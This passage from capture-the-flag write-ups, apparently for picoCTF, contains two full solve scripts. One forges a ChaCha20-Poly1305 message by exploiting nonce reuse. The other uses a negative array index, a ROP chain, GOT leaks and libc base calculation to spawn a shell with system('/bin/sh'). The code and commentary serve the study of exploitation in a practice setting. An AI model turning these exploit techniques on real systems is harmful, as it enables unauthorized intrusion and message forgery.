    n = len(c)
    res = 0
    for i in range(n):
        res += c[i]
        res = (r*res) % P
    return (res + s) % mod2

def atk(pair1, pair2, nonce, m3):
    m1, c1, t1 = pair1
    m2, c2, t2 = pair2
    t1 = int.from_bytes(t1, byteorder='little')
    t2 = int.from_bytes(t2, byteorder='little')

    # same nonce means same keystream, so recover it from a known pair
    keystream = bytes(a ^ b for a, b in zip(c1, m1))
    c3 = bytes(a ^ b for a, b in zip(m3, keystream))

    f1 = 0
    f2 = 0
    for i in get_blocks(c1):
        f1 += i
        f1 *= x
    for i in get_blocks(c2):
        f2 += i
        f2 *= x

    rs = []
    for k in range(-4, 5):
        rhs = t1 - t2 + 2**128 * k
        f = rhs - (f1 - f2)
        for r, _ in f.roots():
            # keep only roots that satisfy the Poly1305 clamping of r
            if int(r) & 0x0ffffffc0ffffffc0ffffffc0fffffff == int(r):
                s = (t1 - int(f1(r))) % 2**128
                rs.append((r, s))

    r, s = map(int, rs[0])
    t3 = tag(c3, r, s)
    # pad to 16 bytes so a tag with leading zero bytes isn't shortened
    t3 = long_to_bytes(t3, 16)[::-1]
    return c3, t3

messages = [
    b"Did you know that ChaCha20-Poly1305 is an authenticated encryption algorithm?",
    b"That means it protects both the confidentiality and integrity of data!"
]
goal = "But it's only secure if used correctly!"

# io = remote("activist-birds.picoctf.net", 61677)
io = process(['python3', 'picoserver.py'])

io.recvuntil(b"Ciphertext (hex): ")
a = io.recvline().strip().decode()
c1 = bytes.fromhex(a)
io.recvuntil(b"Ciphertext (hex): ")
a = io.recvline().strip().decode()
c2 = bytes.fromhex(a)

def extract(pkt):
    # packet layout: ciphertext || 16-byte tag || 12-byte nonce
    ct = pkt[:-28]
    tag = pkt[-28:-12]
    nonce = pkt[-12:]
    return ct, tag, nonce

c1, t1, n1 = extract(c1)
c2, t2, n2 = extract(c2)
n = n1
m1, m2 = messages
m3 = goal.encode()

c3, t3 = atk((m1, c1, t1), (m2, c2, t2), n, m3)
forged = c3 + t3 + n
io.sendline(forged.hex().encode())
io.interactive()
```

## handoff

Looking at the source, we can see an obvious buffer overflow into the feedback array. However, using the buffer overflow we can control `rbp`, `rip`, and nothing else. While this is exploitable, it is annoying and not very fun. Instead we exploit the negative indexing into the `entries` array, which writes more data. Writing to `entries[-1]` allows you to overwrite the `fgets` return address and set up a ROP chain in `entries[0]`.

Since the binary is compiled without PIE, we don't need to leak anything to do ROP. The handout does not provide remote libc, so we leak GOT entries using a ROP chain `pop rdi ; puts`. Throwing the leaked addresses into `libc.rip` gives hits for `ubuntu 2.35`.
Now we can calculate libc base from the libc leaks and pop a shell with `system("/bin/sh")`.

### solve script

```py=
from pwn import *

context.terminal = ["kitty"]
context.binary = file = ELF("./handoff")
libc = ELF("./libc.so.6")

script = """
# b *0x0040136e
# b *fgets+0xfe
c
"""

if not args.REMOTE:
    p = gdb.debug("./handoff", gdbscript=script)

def add(name: bytes):
    p.sendlineafter(b"app\n", b"1")
    p.sendlineafter(b": \n", name)

def edit(idx: int, data: bytes):
    p.sendlineafter(b"app\n", b"2")
    p.sendlineafter(b"?\n", f"{idx}".encode())
    p.sendlineafter(b"?\n", data)

poprdi = 0x0000000000401473
puts = 0x00401090

def connect():
    if args.REMOTE:
        return remote("shape-facility.picoctf.net", "50867")

def arbread(addr: int):
    # global p
    # p = connect()
    payload = flat({
        0x00: poprdi + 1,
        0x08: poprdi + 1,
        0x10: p64(number=file.sym.main)
    })
    add(payload)
    payload = flat({
        0x28: poprdi,
        0x30: addr,
        0x38: puts,
    })
    edit(-1, payload)
    leak = u64(p.recvline()[:-1].ljust(8, b"\x00"))
    log.info(f"{leak = :#x}")
    # p.close()
    return leak

# arbread(file.got.fgets) # 0x71eff9797380
# arbread(file.got.puts) # 0x7992b5c88380
# arbread(file.got.getchar) # 0x7476c2d32380
# arbread(file.got.fflush) # 0x7a1490b36380
# arbread(file.got.setvbuf) # 0x7e85d23cb380

if args.REMOTE:
    p = connect()

fgets = arbread(file.got.fgets)
libcbase = fgets - 0x7f380
libc.address = libcbase
log.info(f"{libcbase = :#x}")

# adjusted = (fgets - 0x80000) & ~0xfff
# arbread(fgets)

p.recvuntil(b"option\n")

payload = flat({
    0x00: libc.sym.system
})
add(payload)
payload = flat({
    0x28: poprdi,
    0x30: next(libc.search(b"/bin/sh\x00")),
    0x38: poprdi + 1,
})
edit(-1, payload)

p.interactive()
```
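The libc base arithmetic in the script can be checked by hand. A minimal sketch, assuming the `fgets` leak recorded in the script's comments and the `0x7f380` offset the script subtracts (both taken from the writeup, not verified against a libc here):

```python
fgets_leak = 0x71eff9797380  # leak value recorded in the script's comments
FGETS_OFFSET = 0x7f380       # offset of fgets used by the solve script

libc_base = fgets_leak - FGETS_OFFSET

# a correct base is page-aligned; a non-zero low 12 bits means a wrong libc guess
assert libc_base & 0xfff == 0
print(hex(libc_base))
```

If the alignment check fails on a fresh leak, the offset (and so the libc version guess) is the first thing to revisit.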
